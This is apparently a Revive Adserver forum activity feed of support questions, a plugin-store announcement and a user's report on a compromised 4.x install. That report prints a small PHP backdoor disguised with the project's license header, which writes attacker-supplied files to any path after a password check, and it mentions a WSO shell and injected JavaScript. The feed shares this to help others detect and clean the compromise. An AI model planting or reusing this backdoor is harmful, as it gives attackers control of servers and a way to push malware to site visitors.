Jump to content

All Activity

This stream auto-updates     

  1. Yesterday
  2. Hello, do you know why the number of banner impressions is not equal to the number of pageviews in Google Analytics? Do you need any special configuration so that the numbers are at least close? thank you
  3. Hello: I'm on the latest edition of Revive, but recently discovered to be infected with the Tag Barnacle per: https://blog.confiant.com/tag-barnakle-the-malvertiser-that-hacks-revive-ad-servers-redirects-victims-to-malware-50cdc57435b1 Any idea where/how to clean out the relevant malicious files? Thanks,
  4. Thanks @andrewatfornax for response. If I correctly understood it's possible but still don't documentations correct?
  5. Last week
  6. For extra protection ... you can disable php execution on www/images
  7. Thanks. Saw that too. Wonder why this information not was in the forum.
  8. Very late reply but I encountered the same issue... (I'm posting in case that may help someone else). The file in the images directory (with a similar kind of name) was used from time to time to load a shell on my server (which would be erased after the "work" was done). The hacker was free to directly connect to my DB and put its payload to the banners (Zone's PREPEND fields were loaded with Malicious Javascript) or do anything he/she wanted.
  9. Beware that they did not also leave a backdoor on your site... I just published a new topic on that subjet. Once a hacker has access to your site like they could have with the security hole in 4.x their possibilities are endless. Check your www/images directory for php files. T.
  10. My previous 4.x install got compromised, some of my users were complaining about malware alert and/or unwanted advertising (it was not all the time nor on all platform, making the issue difficult to pinpoint). I thought cleaning the Revive DB and upgrading my Revive install would be enough to secure my site but sadly no, PREPEND payloads kept being added from time to time despite running the latest version of Revive. It took some hunting but I eventually discovered the hacker left a tiny PHP file in my Revive www/images directory. As I'm keeping that directory during upgrades, the security hole remained. The file was simple : ---- <?php /* +---------------------------------------------------------------------------+ | Revive Adserver | | http://www.revive-adserver.com | | | | Copyright: See the COPYRIGHT.txt file. | | License: GPLv2 or later, see the LICENSE.txt file. | +---------------------------------------------------------------------------+ */ if(isset($_POST['adSelect']) && md5($_POST['adSelect']) == '***MD5HASH***') { @file_put_contents($_POST['banner_path'], $_POST['banner_contents']); } ---- This allowed the hacker to load and execute any kind of files/scripts on my server!!!! Lately he/she was uploading a "1.php" file (containing as I found out a WSO shell) which he/she would connect to, in order to load PREPEND payload to my Revive DB... He would use a different IP to create the 1.php and connect to it (trying to hide its trace). The file would be erased once he/she had done her "job". The process looks fairly manual. Of course the hacker may well have left other backdoors outside of my Revive install 😞 😞 😞 This makes it impossible to guarantee all issues are resolved after an upgrade (may be a quick check for PREPEND payload and/or PHP files in the www/images directory could offer an alert that something is fishy...). I would strongly recommend anyone who's had a 4.x install compromised to hunt for such files. Cheers, T.
  11. There's a maintenance script that handled campaign deactivation - however, it only runs once per hour. https://documentation.revive-adserver.com/display/DOCS/Running+Maintenance Unfortunately, if you have a target that's going to be reached in under an hour, there's not much you can do - the product is designed for longer term contracts, not ones that run that fast!
  12. Unfortunately, I don't think we have that documented under https://documentation.revive-adserver.com/display/DOCS/Developer+Guide yet...
  13. Yes Also found what they did. They changed asyncjs.php and put code in that file
  14. Gerd

    CTO

    Hi I'm trying to deliver 500 banner. I set that number when defining the campain. After 10 minutes 500 banners are shown to the public but the campain does not stop, it still delivers more and more. How can I terminate such a campain after the limit is reached ? Gerd
  15. Earlier
  16. I run a SAAS site where users are able to create a Unique URL that serves a simple webpage. Example: https://minibio.link/demo I need for my registered users to be able to sell a Text Link on their page to Advertisers. (Example: The Top button Link) I'm looking for someone to help Architect the process of making this happen using Revive, then a quote to code it.
  17. Revive Adserver Plugin store open for business! Summary Introducing the Revive Adserver Plugin store, offering third party plugins to extend and enhance the functionality of your ad server system. In more detail The Revive Adserver software can be extended and enhanced by adding plugins. This enables developers to build additional functionality or to extend existing functionality. As a matter of fact, a large part of the core functionality of the Revive Adserver software is provided in the form of plugins. These plugins are automatically installed when the Revive Adserver software is installed. The beauty about all plugins – assuming they’ve been coded correctly – is that they will automatically be taken along during software updates of the Revive Adserver software itself. The update wizard will simply go over the entire list of installed plugins and put them into the updated version. Plugins can also be updated individually, when the developer releases a new version of their product, without having to do a full update of the core software. Even though the plugin model has been a part of the Revive Adserver software for more than a decade, we noticed that this is not as well known as we would like it to be. We want to encourage users of our software to consider adding plugins that might make it even more useful. And we also want to encourage developers to consider building new plugins. In addition, we want it to be more convenient for users to discover high quality plugins and to safely purchase them. That’s why we’re launching the Revive Adserver Plugin store right here on the website. It is open for business already, and we’ve listed the first few products as well. More will be added in the very near future. For potential buyers of these plugins, it should act as a place where they can find and purchase products that have been vetted by the Revive Adserver team. For developers, this should act as a central hub that’s easy to find for buyers, potentially giving them a much larger audience then trying to build a presence on their own. Initially, we will proactively reach out to developers we know and trust, asking them if they’re interested in having their products listed in the new Plugin store. Later, we will create a way for other developers to submit their products to us for consideration. At that time we will also publish the requirements that each new product will have to fulfil, and the details and costs of the verification process that will be put into place.  Let's go shopping! Please take a minute to have a look at the plugins already available in the Revive Adserver Plugin store! The post Revive Adserver Plugin store open for business! appeared first on Revive Adserver. View the full article
  18. We have a ton of changes in the delivery prod/completed files (asyncspc.php, lg.php and etc), I decided to move changes to the source files, but I can't find information for to build/complete source files to the production/server version. Can someone describe where I can find information or to do that? Thanks.
  19. No, I don't know why it wouldn't work based on the information above.
  20. ** Nevermind I must be blind as a bat.. Sorry about that.
  21. So, the important test I did was that it works fine using Iframe tags, but will not work at all using the async tags. Do you know why that would be? Again, I've tried everything, and to me it seems to be some sort of coding issue with the async tags.
  22. Hi @andrewatfornax Thank you for explaining this. Well that option "Geo -Country" doesn't show up on my server. Not sure why? Is there a way to fix this so you can the "country only" option too in the drop down list? Also thank you very much for explaining "regex". So that is for adding custom PHP code into in other words then to create specific match? Thanks a bunch. Kind regards AngryWariror
  23. do you mean you the zone keep showing the remnant campaign, no matter an override campaign is linked ?
  24. Hi @c0i0t3, That image you have linked to shows the permissions of a Revive Adserver account. I'm talking about the permissions to access files on the web server. I don't think the web server can access the files - please review your web server logs and documentation.
  1. Load more activity


×
×
  • Create New...